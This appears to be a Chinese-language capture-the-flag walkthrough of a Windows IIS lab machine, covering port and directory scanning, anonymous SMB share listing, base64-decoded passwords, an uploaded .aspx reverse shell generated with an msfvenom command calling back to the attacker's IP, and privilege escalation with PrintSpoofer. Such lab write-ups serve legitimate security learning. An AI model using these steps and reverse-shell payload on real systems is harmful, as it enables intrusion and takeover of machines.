扫描打点
80端口是一个IIS10.0,扫了下网站啥都没有
这个b靶机÷完了,坐了一天牢发现是
nmap命令不对,然后就这样,扫出来不同结果:
扫出来多余三个端口,在针对这几个端口详细扫描:
然后我详细信息又扫不出来了:
睡了一觉又出来了,可能是靶机的问题:
看到
49663也有IIS服务器,继续扫一下看看,只找到一个空的目录:
这里有个要注意的地方,用
gobuster的medium字典是能扫出来东西的(大概扫了有 $40$ 分钟吧,很难想象实战中该怎么办):
/nt4wrksv
然后根据
wp可以用nmap的--script=vuln参数来用脚本扫描,扫了 $20$ 分钟后看到有永恒之蓝
但让尽可能不用
msf就先不用了那就先裸连一下连是连不上,但是可以空密码列举共享的资源:smb好了
看到了一个奇怪的东西,连一下试试:
文件内容是:
1
2
3[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk这个等号看着像
base641
2Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$当然这个也可以从浏览器访问到:
smb传反弹shell现在基础的工作已经做完了,目前有两个人的账号密码,
smb特定目录的文件权限且该目录能从浏览器访问到账密目前不能登录
smb,而且传反弹shell的条件已经全了,就先传shell上去。这里不能用
msf就用正常的反弹了这里刚刚看
smb文件的时候好像没正常断开导致smb连不上了,所以后面的靶机ip又改了(大嘘注意这个是
windows的,别拿那个blinux的反弹shell传了,还有要生成.aspx的反弹shell而非.asp,原因是aspx会使用ASP.NET引擎来运行
1
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.99.99 LPORT=443 -f aspx -o windows_rev_443.aspx
dir /s /b c:\ | find "user.txt"
PrintSpoofer实现Windows提权这里由于不能用
msf就传不了PowerUp,仿照Alfred里面看下whoami /priv
中间这个
SeImpersonatePrivilege在Alfred里面被用来模拟用户token,但那次是用msf做的,这次要手动做了来这里下载PrintSpoofer.exe并传上去
根据所说的,执行
PrintSpoofer.exe -i -c cmd
去
/users/administrator/Desktop找到root.txt
啊不对啊我草,刚刚的账号密码怎么没用到
看了一圈也没有利用到这个的,可能只是用来转移视线的